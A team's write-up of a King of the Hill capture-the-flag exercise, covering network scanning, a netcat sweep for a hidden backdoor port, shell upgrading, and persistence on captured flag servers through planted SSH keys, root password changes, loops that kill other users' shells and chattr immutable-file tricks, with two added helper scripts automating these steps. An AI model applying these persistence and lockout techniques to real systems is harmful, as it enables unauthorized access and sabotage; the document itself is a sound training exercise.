Intro

King of the Hill (KotH) challenges involve taking control of a server and leaving your team's identifier on a specified target server or application. Whichever identifier is present when the scoreboard polls shows which team currently controls that server.
Network

1. Team Subnets. Each team has its own subnet containing one boundary VyOS router at the .1 address, which connects the team subnet to the Hill subnet; five Kali Linux systems for offensive work; and one flag server at the .100 address, where the team must place its CTF ID in owner.txt to score points.

2. Hill Subnet (192.168.20.0/24). Contains vulnerable Linux, Windows 10 and Windows 11 flag servers, plus a Big Hill server that awards 3 points per poll while captured. It also holds an off-limits hill (the VIVID flag): capturing it incurs a penalty.

3. Access Control and Credentials. Each team's boundary router is reachable over SSH on port 22 with vividctf:vividctf, and each team's flag server over SSH on port 22222 with the same credentials. By default the boundary routers block inbound traffic on ports 22 and 3389 from outside the team subnet. Teams are allowed to sabotage each other by modifying configurations anywhere except on the Kali systems.

4. Objective. Place your CTF ID in the owner.txt file on your own flag server and on as many Hill subnet flag servers as possible. Points are awarded every 60 seconds based on the contents of owner.txt on each server. Every team can reach the Hill subnet and every other team's subnet, so both attacks and defences run across networks.

Action Plan:

1. Planning and Team Strategy. At the outset we held a team discussion and split the roles: two members attacking (opponent systems and the Hill subnet), two members defending (our own subnet and servers), and one member on reconnaissance, gathering intelligence on the other teams and the Hill subnet.

2. Initial Target: Routers. Our first target was the other teams' boundary routers. Compromising a router lets you disrupt that team's communication and observe or manipulate its traffic, which is a strategic advantage for the rest of the game.

3. Hill Subnet Reconnaissance. A host scan of the Hill subnet turned up several live machines. To identify the services on them we saved the live addresses in hill.txt and ran a full-port service detection scan:

    nmap -iL hill.txt -p- -sV

4. Discovery of Unusual Activity. One machine stood out with more than 500 open ports in the 32000-60000 range. Nmap could not identify the services behind them; we took these to be decoy listeners planted to hide the real service among many look-alikes.

5. Flag Server Review. Once we had access to our own flag server, we reviewed every open port and running service on it. One of them was a Python service listening on a randomized port between 40000 and 60000 that gave anyone a backdoor into the machine once it received the correct string payload. Our assumption was that every team's flag server started from the same image, so the same backdoor would exist on all of them.

6. Automated Port Scans. The assumption held: a sweep of ports 40000-60000 on another team's flag server found exactly one port that answered differently from the rest. We used a netcat loop of this shape:

    for port in {40000..60000}; do
        echo "== $port"
        nc -w 1 192.168.2.100 "$port"
    done

Printing the port number before each connection tells you which port produced the odd response, and the one-second timeout (-w 1) stops the loop from hanging on a listener that sits waiting for input. Once the port is known, connect to it on its own (nc 192.168.2.100 PORT) to send the payload interactively.

7. Exploiting a Backdoor. With the port identified, exploitation was a matter of sending the crafted payload over that netcat connection. The backdoor returned a limited /bin/sh shell, which we upgraded to a full one with:

    /bin/bash -i

That gave us full access to several teams' flag servers. We also patched the backdoor running on our own flag server so the other teams could not use it against us in the same way.
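Steps 5 to 7 describe finding the backdoor port by hand. The script below is an added example, not code from the original write-up: it automates the sweep with nc and then picks out the port whose reply differs from the majority, which is the signature of one real listener hidden among decoys. The host, port range, probe string and one-second timeout are assumptions for illustration, and the backdoor's actual payload is not reproduced here.

```shell
#!/bin/sh
# Added example, not from the original write-up. Sweeps a port range on a
# flag server and reports the port(s) whose reply differs from the majority.
# Assumptions: nc accepts -w (OpenBSD or GNU netcat); host, range and the
# probe string are placeholders.

# sweep HOST LO HI [PROBE]: print "port<TAB>reply" for every port that
# accepted a connection. The 1 s timeout stops the loop from hanging on a
# listener that waits for input; replies are flattened to one short line.
sweep() {
    host=$1; lo=$2; hi=$3; probe=${4:-hello}
    for port in $(seq "$lo" "$hi"); do
        if reply=$(printf '%s\n' "$probe" | nc -w 1 "$host" "$port" 2>/dev/null) \
           || [ -n "$reply" ]; then
            printf '%s\t%s\n' "$port" \
                "$(printf '%s' "$reply" | head -c 120 | tr '\r\n' '  ')"
        fi
    done
}

# outliers: read "port<TAB>reply" lines on stdin and print the ports whose
# reply is not the most common one. With hundreds of identical decoys the
# real backdoor is the odd one out; with no decoys every port looks "odd".
outliers() {
    awk 'BEGIN { FS = OFS = "\t" }
        { reply[$1] = $2; seen[$2]++ }
        END {
            top = ""; max = 0
            for (r in seen) if (seen[r] > max) { max = seen[r]; top = r }
            for (p in reply) if (reply[p] != top) print p, reply[p]
        }' | sort -n
}

# find_backdoor HOST LO HI: the two stages chained together.
find_backdoor() {
    sweep "$1" "$2" "$3" | outliers
}

# Usage: sh backdoor-hunt.sh 192.168.2.100 40000 60000
if [ -n "${1:-}" ]; then
    find_backdoor "$1" "${2:-40000}" "${3:-60000}"
fi
```

The sweep stage is the slow part (20000 connections at up to one second each); the outlier stage is pure text processing and can be re-run on a saved sweep file, which is also how you check it offline.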
8. Claiming Flag Servers. Scoring was based on which team's ID sat in /root/owner.txt on each flag server. At first we simply edited owner.txt to claim ownership and started earning 3 points per minute. We had not established persistence, however, and an opposing team eventually cut our access by killing our shell process and patching the backdoor.

9. Web Server Exploitation. Further analysis of the flag server also showed a web server:

    Nmap scan report for 192.168.2.100
    Host is up (0.00048s latency).
    Not shown: 999 closed tcp ports (reset)
    PORT   STATE SERVICE VERSION
    80/tcp open  http    Node.js Express framework

Through reconnaissance and testing we found a command injection vulnerability in the web application, and exploiting it gave us a second way back onto the machine after the backdoor was gone.

10. Establishing Persistence. This time, so that opposing teams could not kick us out again, the first thing we did on each flag server was establish persistence. We did this in three steps.

First, we put our SSH public key in ~/.ssh/authorized_keys. The single > overwrites the file on purpose, so any key another team had planted is removed at the same time; the mkdir and chmod lines make sure sshd will actually accept the file:

    mkdir -p ~/.ssh && chmod 700 ~/.ssh
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCqIvZaOr0exvLzNtjueoj3qyYydaHFgSgbjn3OqE6XVgydjIP4cIfN2xOxrT56JQODsoBya8HLrRrejNaLw6sK+8+8Vh+J/kp5Qb3J4kmVdosvWhWV/QWlTlmVassAwz0laZHTZucbYtH45zJ9RpjWpgbBCmgc8s5LN+88ZQcob17F0+r/GeBH+3KBzV/CccPV+0nQ2Umr94UDqixDUMEI1oOmi88jV/EUVIgP9l8Wjz0AfcCLKG0mT7EIiQpPsN2GfYQ0lcJBpp2+OIcqwZ7q4DgGQOz1OKgbTemC3XZ6fGsNxtbrdzGvwKo4c3LLm/DKI5hVx826NiWikNNox/9kM1VipqfnOozsQLdN6CjGUarExlsvHb6iP/UHHc537jB3ZiYHKHeE1tbkiBFKOAFHfw8VkY+s7SQCcMLOuID91epMUQoKIp2pXU88wYEQuf7t0J/9/pJRbaK8VI+mVPCSVcZ5K2zSw+J/W3qVpIjnGuqPK8bJa0ftGfqgXBBPkk0= mayank" > ~/.ssh/authorized_keys
    chmod 600 ~/.ssh/authorized_keys

Second, we changed the root password (passwd) to one only our team knew.

Third, we kicked everyone else off the server by killing their bash processes:

    current_pid=$$
    for pid in $(pgrep -x bash | grep -vx "$current_pid"); do
        kill -9 "$pid"
    done

Two details matter here. grep -vx matches the whole line, so sparing PID 123 no longer also spares 1230 or 12345 the way a plain grep -v "123" would. And the loop has to be typed into the interactive shell rather than run as a script, because $$ is the PID of the shell executing it; from a script that is the script's own shell, and the loop would kill the session you are sitting in. The raw backdoor shell is /bin/sh rather than bash, so adding pgrep -x sh to the list catches anyone who has not upgraded their shell yet.

After doing this on a few flag servers we had full, exclusive access to several of them.

11. Locked Permissions and Claiming Flags. With persistent access in place we found that owner.txt had been locked with chattr: writes failed with a permission error even though we were root, the file was owned by root and its mode was 0644. Ordinary permissions cannot explain that, and lsattr confirmed the cause: the immutable flag (i) was set on the file, which blocks every write, rename and deletion regardless of user until chattr -i clears it. On top of that, the chattr binary had been removed from its original location in /bin. The opposing team had most likely done this before we kicked them off, to stop us from claiming points.
However, a search of the whole filesystem found the chattr binary hidden in a randomly named directory:

    find / -name chattr 2>/dev/null

Output:

    /var/7cy7grc93q97c/chattr

With that binary we cleared the immutable flag with chattr -i, wrote our flag into owner.txt and started earning points. We then set the flag again with chattr +i on owner.txt on our own flag server and on the other servers we had taken, so that an opposing team would have trouble changing the file even if we somehow lost access. That did not happen.

Summary

Before the King of the Hill segment of the competition we were in 11th place; after it we finished 5th. Moving fast, constantly watching the machines we owned for suspicious activity and constantly attacking other teams meant we did very well in this part of the competition and climbed several places. Along the way we practised reconnaissance, finding vulnerabilities through code review, exploiting servers through known vectors, and maintaining persistence after compromising a machine.
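Steps 10 and 11 above (persistence, then unlocking and relocking owner.txt) as one set of shell helpers. This is an added example, not the team's code: install_key overwrites authorized_keys on purpose like the echo in step 10, kick_others fixes the substring-matching problem and spares our own session's ancestors so it is safe to run as a script, and claim handles the chattr dance even when the binary has been moved out of /bin. The key text, the CTF ID, the file path and the advice to scp a chattr over if none is found are placeholders and assumptions; kick_others and claim need root on the target, so only the pure helpers can be exercised locally.

```shell
#!/bin/sh
# Added example, not from the original write-up: the persistence and
# claiming steps as reusable functions. Placeholders: the key text, the
# CTF ID and the file path. kick_others and claim need root on the target.

# install_key HOME_DIR PUBKEY: replace authorized_keys with our key only
# (deliberately dropping any key another team planted) and set the modes
# sshd requires, or the key is silently ignored.
install_key() {
    home=$1; key=$2
    mkdir -p "$home/.ssh" && chmod 700 "$home/.ssh"
    printf '%s\n' "$key" > "$home/.ssh/authorized_keys"
    chmod 600 "$home/.ssh/authorized_keys"
}

# keep_list: our own PID and every ancestor up to init, space separated.
# Killing an ancestor (the sshd session, the login shell) kills us too,
# which is the trap the one-liner in step 10 falls into when run as a script.
keep_list() {
    p=$$; out=" "
    while [ "$p" -gt 1 ]; do
        out="$out$p "
        p=$(ps -o ppid= -p "$p" | tr -d ' ')
        [ -n "$p" ] || break
    done
    printf '%s' "$out"
}

# should_kill PID KEEP_LIST: true unless PID is in KEEP_LIST. Exact match:
# "grep -v 123" would also spare 1230 and 12345, this does not.
should_kill() {
    case "$2" in *" $1 "*) return 1 ;; *) return 0 ;; esac
}

# kick_others: kill every bash and sh process that is not ours. The raw
# backdoor shell is /bin/sh, so pgrep -x bash alone would miss it.
kick_others() {
    keep=$(keep_list)
    for pid in $(pgrep -x bash; pgrep -x sh); do
        if should_kill "$pid" "$keep"; then kill -9 "$pid" 2>/dev/null || true; fi
    done
}

# is_immutable LSATTR_LINE: lsattr prints "----i---------e------- /path";
# the immutable flag is the letter i in the first field. An immutable file
# rejects writes from root even with mode 0644, which is what step 11 saw.
is_immutable() {
    case "${1%% *}" in *i*) return 0 ;; *) return 1 ;; esac
}

# find_chattr: the binary may have been moved out of /bin (step 11), so
# fall back to searching the whole filesystem, as the team did.
find_chattr() {
    command -v chattr 2>/dev/null && return 0
    find / -type f -name chattr 2>/dev/null | head -n 1
}

# claim FILE ID: unlock, write our ID, relock. Stops loudly if no chattr
# binary exists anywhere; scp one over from a Kali box in that case.
claim() {
    file=$1; id=$2
    chattr_bin=$(find_chattr)
    [ -n "$chattr_bin" ] || { echo "no chattr on this box" >&2; return 1; }
    if is_immutable "$(lsattr "$file")"; then "$chattr_bin" -i "$file"; fi
    printf '%s\n' "$id" > "$file"
    "$chattr_bin" +i "$file"
    lsattr "$file"
}

# Usage on a compromised flag server (all of it as root):
#   install_key /root "ssh-ed25519 AAAA... team"; kick_others
#   claim /root/owner.txt OUR_CTF_ID
```

Relocking with +i at the end of claim is the same trick the opposing team used against us; the difference is that we keep the chattr path from find_chattr, so losing the binary is no longer a blocker on our side.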
...